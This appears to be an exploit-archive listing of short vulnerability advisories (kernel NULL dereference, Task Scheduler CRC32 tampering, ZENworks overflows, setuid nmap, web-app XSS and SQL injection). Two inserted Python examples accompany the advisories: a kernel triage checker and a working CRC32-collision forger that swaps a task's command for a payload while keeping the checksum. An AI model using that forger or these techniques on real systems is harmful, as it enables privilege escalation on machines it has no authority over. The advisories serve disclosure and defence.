The Linux kernel failed to properly initialize some entries in the proto_ops structures of several protocols, leaving NULL to be dereferenced and used as a function pointer. By using mmap(2) to map page 0, an attacker can execute arbitrary code in the context of the kernel. Several public exploits exist for this vulnerability, including spender's wunderbar_emporium and rcvalle's PPC port, sock_sendpage.c. All Linux 2.4/2.6 versions since May 2001 are believed to be affected: 2.4.4 up to and including 2.4.37.4, and 2.6.0 up to and including 2.6.30.4.
9bd69f05ada8cee6b76af8cc4636ab3a3a49a49bfad809f7b97fefaea4e48bb0
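A triage helper for the sock_sendpage entry above, added here as an example and not one of the listed exploits. It applies the inclusive version ranges the advisory gives and reads the vm.mmap_min_addr sysctl, the kernel setting that refuses low mappings such as the page-0 mmap(2) the exploit depends on. Assumptions: the kernel reports a mainline-style release string, and the sysctl lives at its usual /proc path; a distribution kernel may carry a backported fix that a bare range check cannot see, so the result is a prompt to verify, not a verdict.

```python
"""Triage for the sock_sendpage NULL proto_ops issue (added example)."""
import platform
import re

# Inclusive ranges taken from the advisory text above.
AFFECTED_RANGES = (
    ((2, 4, 4), (2, 4, 37, 4)),
    ((2, 6, 0), (2, 6, 30, 4)),
)


def parse_kernel_version(release: str) -> tuple:
    """'2.6.30.4' -> (2, 6, 30, 4); '2.6.32-5-amd64' -> (2, 6, 32).

    Only the leading dotted numeric part is used; distro suffixes are ignored.
    """
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(g) for g in m.groups() if g is not None)


def in_advisory_range(release: str) -> bool:
    """True if the release falls inside one of the advisory's ranges.

    Tuple comparison gives the right answer for a missing fourth component:
    (2, 6, 30) < (2, 6, 30, 4), so 2.6.30 counts as affected.
    """
    v = parse_kernel_version(release)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def read_mmap_min_addr(path: str = "/proc/sys/vm/mmap_min_addr"):
    """Return the sysctl value, or None if it cannot be read (non-Linux,
    kernel too old to have the knob, or no permission). Assumed path."""
    try:
        with open(path) as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return None


def assess(release: str, mmap_min_addr) -> str:
    """Combine the version check with the page-0 mapping mitigation."""
    if not in_advisory_range(release):
        return "outside advisory range"
    if mmap_min_addr is None:
        return "in advisory range; mmap_min_addr unknown, verify manually"
    if mmap_min_addr == 0:
        return "in advisory range; mmap_min_addr=0, page 0 mappable: likely exploitable"
    return (f"in advisory range; mmap_min_addr={mmap_min_addr} blocks the "
            f"page-0 mapping (mitigation present, not a fix)")


if __name__ == "__main__":
    rel = platform.release()
    print(rel, "->", assess(rel, read_mmap_min_addr()))
```

A non-zero mmap_min_addr only removes the page-0 mapping this particular exploit path uses; the kernel still needs the fix, so treat "in advisory range" as the finding and the sysctl as context.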
This Metasploit module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler uses only a CRC32 checksum to validate that the file has not been tampered with. Also, in a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
d58b245a3284a4c3a0c953e6cd974d43047680186d9ff32f042bd97e492059fb
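A worked example of the CRC32-collision step, added here and not taken from the Metasploit module: given a tampered copy of a file, compute the four bytes that restore the original checksum, and hide them in a trailing XML comment so the document stays well-formed. CRC32 is linear, and each lookup-table entry has a distinct top byte, so the register can be run backwards and the four patch bytes solved for directly; no brute force over the checksum is needed. The XML below is a constructed stand-in, not a real Task Scheduler file, and the comment placement and the "comment-safe ASCII" retry loop are this example's choices, not necessarily what the module does.

```python
"""Forge a 4-byte CRC32 patch for a tampered file (added example)."""
import zlib

POLY = 0xEDB88320          # reflected CRC-32 polynomial, as used by zlib.crc32
MASK = 0xFFFFFFFF

# Standard reflected CRC-32 lookup table.
TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ POLY if c & 1 else c >> 1
    TABLE.append(c)

# The 256 top bytes of TABLE are all distinct, so a register's top byte
# identifies which table entry was XORed in last. That is what makes the
# CRC invertible.
REV = {t >> 24: i for i, t in enumerate(TABLE)}
assert len(REV) == 256


def crc32(data: bytes) -> int:
    return zlib.crc32(data) & MASK


def crc_backward(reg_after: int, tail: bytes) -> int:
    """Undo the CRC update for known bytes: return the register value that
    yields reg_after once `tail` has been processed."""
    reg = reg_after
    for b in reversed(tail):
        i = REV[reg >> 24]
        reg = (((reg ^ TABLE[i]) << 8) | (i ^ b)) & MASK
    return reg


def forge_patch(prefix: bytes, tail: bytes, target: int) -> bytes:
    """Return 4 bytes X such that crc32(prefix + X + tail) == target."""
    # Register that must hold right before `tail` (undo zlib's final XOR).
    want = crc_backward(target ^ MASK, tail)
    # Run the four unknown bytes backwards to fix the table indices; the
    # register after `prefix` drops out of the final value entirely.
    idx = []
    cur = want
    for _ in range(4):
        i = REV[cur >> 24]
        idx.append(i)
        cur = ((cur ^ TABLE[i]) << 8) & MASK
    # Forward pass: choose the byte that selects each index in turn.
    reg = crc32(prefix) ^ MASK
    patch = bytearray()
    for i in reversed(idx):
        patch.append((reg ^ i) & 0xFF)
        reg = (reg >> 8) ^ TABLE[i]
    assert reg == want
    return bytes(patch)


# Bytes that cannot break out of an XML comment or the markup around it.
SAFE = set(range(0x20, 0x7F)) - set(b"<>&-")


def tamper_with_collision(original: bytes, old: bytes, new: bytes,
                          max_tries: int = 5000) -> bytes:
    """Replace `old` with `new` and hide a 4-byte patch in a trailing XML
    comment so the CRC32 of the result equals that of `original`.

    Filler spaces are added inside the comment until the patch bytes are all
    comment-safe ASCII (about 1 try in 60), keeping the document well-formed.
    """
    target = crc32(original)
    body = original.replace(old, new)
    tail = b" -->"
    for n in range(max_tries):
        prefix = body + b"<!-- " + b" " * n
        patch = forge_patch(prefix, tail, target)
        if all(b in SAFE for b in patch):
            forged = prefix + patch + tail
            assert crc32(forged) == target
            return forged
    raise RuntimeError("no comment-safe collision found")


# Constructed sample, not a real Task Scheduler file.
ORIGINAL = (b'<?xml version="1.0"?><Task><Actions><Exec>'
            b'<Command>notepad.exe</Command></Exec></Actions></Task>')

if __name__ == "__main__":
    forged = tamper_with_collision(ORIGINAL, b"notepad.exe", b"C:\\payload.exe")
    print(forged.decode())
    print(hex(crc32(ORIGINAL)), hex(crc32(forged)))
```

The point for defenders is the one the entry makes: a CRC is an error-detection code, not an integrity control, and any check that relies on one is defeated by a few bytes of appended data computed in microseconds.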
This Metasploit module exploits a remote buffer overflow in Novell ZENworks Configuration Management 10 SP2. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted packet with the opcode 0x06 (PROXY_CMD_CLEAR_WS) to port 998/TCP. The module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2 (DEP bypass).
d8e51661349a2d58c55ebba98e0aab7bf40252bcd11e9570670dbb09e98a4244
This Metasploit module exploits a remote buffer overflow in Novell ZENworks Configuration Management 10 SP2. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted packet with the opcode 0x21 (PROXY_CMD_FTP_FILE) to port 998/TCP. The module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2 (DEP bypass).
10965ccc1d7f3bdfb1cdc1edf6199b5eb01250bbec68ab0ee4cf54ba20262a61
Nmap's man page states that "Nmap should never be installed with special privileges (e.g. suid root) for security reasons." and the installer specifically avoids making any of its binaries setuid. Nevertheless, administrators sometimes feel the need to do insecure things. This Metasploit module abuses a setuid nmap binary by writing out a Lua NSE script containing a call to os.execute(). Note that modern interpreters refuse to run scripts from the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.
36e5626623975013ad17de674718bb242f7551a7c65755515d9aab44a7aa57ea
WordPress Cimy User Extra Fields plugin version 2.3.7 suffers from a remote shell upload vulnerability.
3f1cf0c011392b255cd32e6cfb0a2527d78eaaba00b4a507ae004527751b8cc7
ClipBucket version 2 suffers from a remote blind SQL injection vulnerability. Note that this finding houses site-specific data.
908a1ea098afb0afffccbe3d11106c241ae2a4f161d8387e327501693cbf137d
Arora Browser version 0.10.2 remote denial of service proof of concept exploit.
87264302a9bde89050e168e8b2b9679fc2b02cd931240a0e758de293a46e69fa
KeyPass Password Safe version 1.22 suffers from a filter bypass that allows for malicious script code insertion.
fc0a3a882993015dc7a091e373423dcc5d79e487f44fafbaf9d5dd68199ebf13
AVAVoIP version 1.5.12 suffers from cross site scripting and remote shell upload vulnerabilities.
8599e60b92e8454a5283310d93c784484aaad81f0c9a8880f0042a731bd9023d
WordPress plugin Count Per Day version 3.1.1 suffers from multiple cross site scripting vulnerabilities.
28361cdd395c57304d759e3a7c3969bfc5d760b11accedd798ecce30a9dacbee
MGB OpenSource Guestbook version 0.6.9.1 suffers from cross site scripting and remote SQL injection vulnerabilities.
e30d0db62fbca895bd77c358db965a0d775079ae38b45f678fdec8aa710f86ac
The Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug which can be further leveraged to insert user-controlled data, resulting in potential escalation of privileges. Metasploit module included.
a3608689ff5f6a56679189ea8149e0e805de1c706fb7d3fedff592abe11d622b
easyCMSlite version 1.0.9 suffers from a remote database information disclosure vulnerability.
d76b243f67795b89da6846818d5643c0c788edbdf1c583ff25b07a351804feaa
Google Chrome developers, while trying to stay adaptive and current, added some Windows 8 helper functions to aid the development of Metro-style behavior but did not include the library file itself, resulting in an unqualified dynamic-link library call to 'metro_driver.dll'. A user with local disk access can carefully construct a DLL that suits the pattern the client is looking for, place it somewhere along the DLL search path, and the client will load it seamlessly.
dbb9d62577ac5b978fa6419192db9f6b4808436e28a90885a8548c968b26a7d8
Vivotek Cameras suffer from a configuration disclosure vulnerability that leaks password information.
d058e2a1787927c136f919f18b911e8101c71269a4d32b051967630ea19ce337
CakePHP versions 2.x through 2.2.0-RC2 suffer from an XXE injection vulnerability.
54d1c4dda8e08667e5b5c0da52af3bfbbf429c685ad10b6ddb43edebd154ffb5
DomsHttpd versions 1.0 and below suffer from a remote denial of service vulnerability.
df48c1ebd005e29be57fe7d977ca199ab00f6e3cc3896927df8c2e16e4d2d267
This Metasploit module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability is caused by a boundary error in the handling of HTTP requests. While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivot isn't reliable across virtual (VMware, VirtualBox) and physical environments. Because of this the module doesn't use the DEP bypass on the Windows 7 SP1 target, where DEP is OptIn by default and ALLMediaServer doesn't run with DEP.
cd224eb091bd83cac2f6867238fdeea0e253250295ed9b0257c0173e71de0311
Cura is a mobile phone application bundle of remote systems administration tools. It provides a personalized terminal emulator, a syslog module that allows for reading logs directly from a server, a SysMonitor module that visually graphs CPU and RAM usage percentages, access to Nmap, and a Server Stats module that offers general server information such as its vitals, hardware information, memory information, processes, and so on. A security feature will be implemented that allows users to have Cura's database completely wiped upon sending the compromised phone a secret pattern of their choosing (e.g. send an SMS message containing "phone has been stolen!" to your Android phone to wipe Cura's database, and receive the location of the compromised phone as an SMS to your emergency phone number or as an email to your emergency email address).
1701fc58dc21a0ecb6c45f4836abb5e380f5e8214af1f3d389ec0e35ee46a019
Blackboard Mobile Learn version 3.0 suffers from a persistent cross site scripting vulnerability.
b4e651e38bbb3294f231eb8e3bb086bfc5350b4b6edc00836d34547e9116fdee
PBBoard CMS version 2.1.4 suffers from cross site request forgery and cross site scripting vulnerabilities.
3504eeef961d0a59f49c9ee08fb6ee83c790ce14364fa6fe2751a1e2eab9d1a9
SMF Board version 2.0.2 suffers from multiple cross site scripting vulnerabilities.
c9ae40521ca14dc1b3769503b4731284c9910f6abe411ca09d1b0b085880e22c
Lepton CMS version 1.2.0 suffers from multiple cross site scripting vulnerabilities.
a1950761b16455f0831bfaca8919628053e40986ef93c4860bbb883b3dd0f353
Event Calendar PHP version 1.2 suffers from cross site scripting and remote SQL injection vulnerabilities.
3ad4f5c685a677a797142b6d779de69baf513ebfcb1464004b838916e0b78d0f